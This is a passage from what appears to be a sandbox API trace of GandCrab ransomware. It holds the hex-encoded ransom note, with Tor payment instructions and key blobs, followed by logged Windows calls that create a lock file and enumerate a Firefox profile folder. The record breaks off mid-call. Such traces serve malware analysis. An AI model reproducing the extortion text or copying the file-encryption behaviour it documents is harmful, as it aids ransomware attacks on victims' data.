c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0084.389] WriteFile (in: hFile=0x248, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e2fc*=0x2162, lpOverlapped=0x0) returned 1 [0084.390] CloseHandle (hObject=0x248) returned 1 [0084.390] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.390] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.390] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1d, wMilliseconds=0x2ba)) [0084.390] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.390] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.390] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.391] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a09d2ca4deb61a.lock") returned 122 [0084.391] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x248 [0084.393] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.393] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.393] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\") returned 98 [0084.393] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*" [0084.393] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*", fInfoLevelId=0x1, lpFindFileData=0x259e318, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e318) returned 